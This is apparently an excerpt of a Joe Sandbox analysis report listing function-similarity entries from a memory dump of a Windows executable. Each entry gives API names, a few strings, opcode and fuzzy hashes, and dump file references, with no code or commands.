                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap
                                                                                  • String ID:
                                                                                  • API String ID: 4292702814-0
                                                                                  • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                  • Instruction ID: bc651f5412872acb63382a385bc2d8dafebfbce0987c12ed7d8f95d08a607afe
                                                                                  • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                  • Instruction Fuzzy Hash: 69F08291B0A38744FF9476F15800EB4D6A05F84760FCC26B0DDEE466C1EE1EE4428130
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                  • Instruction ID: 0f37409eb70d23ef0f6c599172828eb624d07a19218d1c9c12125cd94c77efab
                                                                                  • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                  • Instruction Fuzzy Hash: DFF0A432A0868685FB249B60E041BB9A761EF14B78F8C4375D73D011E4EF28DC9A8320
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 2659423929-3508440684
                                                                                  • Opcode ID: ff93d16a2b273c6118f741a7e32725ecd73d88bf4e3e3e92d6e46e353eb7c7b6
                                                                                  • Instruction ID: 8bbf3ebf7078b2000e429206d6f0b207f810c556fa86979053eb36898ac06a8f
                                                                                  • Opcode Fuzzy Hash: ff93d16a2b273c6118f741a7e32725ecd73d88bf4e3e3e92d6e46e353eb7c7b6
                                                                                  • Instruction Fuzzy Hash: 55621262F0874285FB00EBF4D444ABDA3A1AF847A4F984272DA6D53AD5DF3CD586C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                  • String ID: %ls$%s: %s
                                                                                  • API String ID: 2539828978-2259941744
                                                                                  • Opcode ID: 6623834c6ca9731efd334e76f2f7c4d48775863e17bd3527b859c843ee7b3cd4
                                                                                  • Instruction ID: a6ed938d23a6cb1e1c1e7ee302d7422620b48cde6e05c3cb39ae56e332decba5
                                                                                  • Opcode Fuzzy Hash: 6623834c6ca9731efd334e76f2f7c4d48775863e17bd3527b859c843ee7b3cd4
                                                                                  • Instruction Fuzzy Hash: 47B20962A1878241FA54BBA5E4509BEE351EFC93C0F984376E6DD037EAEE2CD542C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 1759834784-2761157908
                                                                                  • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                  • Instruction ID: f4652aca178bb7b2265c029b018962784a6d90f601bd689cd22ec3698d2bf8a6
                                                                                  • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                                  • Instruction Fuzzy Hash: A9B21C72A081824BFB65AFA5D440FFDB791FF54388F885179DA0A57B84DF38E5068B20
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                  • String ID: rtmp
                                                                                  • API String ID: 3587137053-870060881
                                                                                  • Opcode ID: 4e83cf1a0bf76f1cd98a138687b98762b91f55a9d542ddcfa5c5c6636e940066
                                                                                  • Instruction ID: 9b761bb18eaed98c779029eab6c03f0c308830a095cb4d5aceac0a658d6fdfbf
                                                                                  • Opcode Fuzzy Hash: 4e83cf1a0bf76f1cd98a138687b98762b91f55a9d542ddcfa5c5c6636e940066
                                                                                  • Instruction Fuzzy Hash: E5F1E522B08B4695FB10EBB5D4405BDA7A1FF853C4F980176EA4D43AA9DF3CD986C350
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1693479884-0
                                                                                  • Opcode ID: 13b57053c9edb0f691e6564e78418f78cd1dc0b326f339559e8595bdf58b92da
                                                                                  • Instruction ID: 68677fd46ade91863bf228f1c3e65931739a2659e0525027668e1e419b92d5fd
                                                                                  • Opcode Fuzzy Hash: 13b57053c9edb0f691e6564e78418f78cd1dc0b326f339559e8595bdf58b92da
                                                                                  • Instruction Fuzzy Hash: BCA1C472F14B5644FE40ABF9C8449BCA361AF45BA4B984275DE6E17BC8DF3CE4438250
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3140674995-0
                                                                                  • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                  • Instruction ID: 4d5f1b279313cfd328c49154d9727a301d9c411539db7383db4fecbab0105b7f
                                                                                  • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                  • Instruction Fuzzy Hash: 58315272609B8289FB609FA0E8507ED7360FF94744F884479DB8D47A98DF38D549C720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1239891234-0
                                                                                  • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                  • Instruction ID: b5a9f39b4553a847fd11d021e5c1be79d7830af2b487eb3b00e1ecdcf6ed7ce4
                                                                                  • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                  • Instruction Fuzzy Hash: 2A31A732604B8185EB64DF65E8406AEB7A0FF88754F940175EA9D43B98DF3CC546C710
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: f9bf03e1b13c0b4c6c7d934612849e6fccaf4440e8589cb7471eab4968075207
                                                                                  • Instruction ID: c4123715ca3b31ef687559db0266e1fb08a60d3c86155dc08cebcc06240f7edb
                                                                                  • Opcode Fuzzy Hash: f9bf03e1b13c0b4c6c7d934612849e6fccaf4440e8589cb7471eab4968075207
                                                                                  • Instruction Fuzzy Hash: 2EB1D122B14686A5FB10ABA5D8406FDA3A1FF857C4FC84276EA4C03B99EF3CD546C350
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AADFAC4
                                                                                    • Part of subcall function 00007FF75AAD7934: GetCurrentProcess.KERNEL32(00007FF75AAE0CCD), ref: 00007FF75AAD7961
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                  • String ID: *?$.
                                                                                  • API String ID: 2518042432-3972193922
                                                                                  • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                  • Instruction ID: 924766de16b47f3316806696730ca5f01bcf3a7403e46e3940ffe4f4ff7d04e3
                                                                                  • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                  • Instruction Fuzzy Hash: 9151C262B15A9545FF51EFE298108BEA3A4FF48BD8B884571DE9D17B85EE3CD0438320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 1502251526-0
                                                                                  • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                  • Instruction ID: 9735668e297d1305114e39a4d3525833578f2367cfdf886e7f1fdeac275c2a40
                                                                                  • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                  • Instruction Fuzzy Hash: 69D1EA32B1868687EB34DF55E184A6AF791FB98744F488138CB4E57B44EB3CE946CB10
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1365068426-0
                                                                                  • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                  • Instruction ID: 9547f14b5c9db4da89f51503ff599a7df08440c8189c980242da31ac8f074ecf
                                                                                  • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                  • Instruction Fuzzy Hash: F4014F7160C74282F750AFA2F85057AA791FF99BC0F8C4074EA8E47B49DE3CD9168750
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .
                                                                                  • API String ID: 0-248832578
                                                                                  • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                  • Instruction ID: 531da9f7318eec8d365fbb5e35703f40bb3020fb853fc7a4d23c2da18e915cc7
                                                                                  • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                                  • Instruction Fuzzy Hash: F6310A22B0869145F760AB76D804BBEAA91AF54BE4F9C8235DE9C07BC5CE3CD5038300
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                  • String ID:
                                                                                  • API String ID: 15204871-0
                                                                                  • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                  • Instruction ID: e0c1eb82444cdf7eb5c6593b99bf15a0697fb159fae020be7aadab63631f9128
                                                                                  • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                  • Instruction Fuzzy Hash: 7FB19E73600B868BEB15DF29D88636C7BA0FB84B48F188976DB5D837A4CB39D452C710
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                  • String ID:
                                                                                  • API String ID: 1061551593-0
                                                                                  • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                  • Instruction ID: df1b7d58085e6fc1588e52d31fa3cdd1e66b81631d29134c80bb565d1c553546
                                                                                  • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                  • Instruction Fuzzy Hash: 0A813936B08A0586FB209FAAD450AACB771FF88B88F4441B6DE0D57B24DF39D546C390
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                  • String ID:
                                                                                  • API String ID: 2169056816-0
                                                                                  • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                  • Instruction ID: 30ad3e4faff34c9a6b63fc8d5f8f25b63fc2facb64a0e6d0d53074fb52b0c5a9
                                                                                  • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                  • Instruction Fuzzy Hash: 2F118C36A08B8199F361AF51E810BE9B360FF88B84FC84176DA8C03668DF3CD146C754
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AAB24C0: CreateFileW.KERNELBASE ref: 00007FF75AAB259B
                                                                                    • Part of subcall function 00007FF75AAB24C0: GetLastError.KERNEL32 ref: 00007FF75AAB25AE
                                                                                    • Part of subcall function 00007FF75AAB24C0: CreateFileW.KERNEL32 ref: 00007FF75AAB260E
                                                                                    • Part of subcall function 00007FF75AAB24C0: GetLastError.KERNEL32 ref: 00007FF75AAB2617
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAB15D0
                                                                                    • Part of subcall function 00007FF75AAB3980: MoveFileW.KERNEL32 ref: 00007FF75AAB39BD
                                                                                    • Part of subcall function 00007FF75AAB3980: MoveFileW.KERNEL32 ref: 00007FF75AAB3A34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
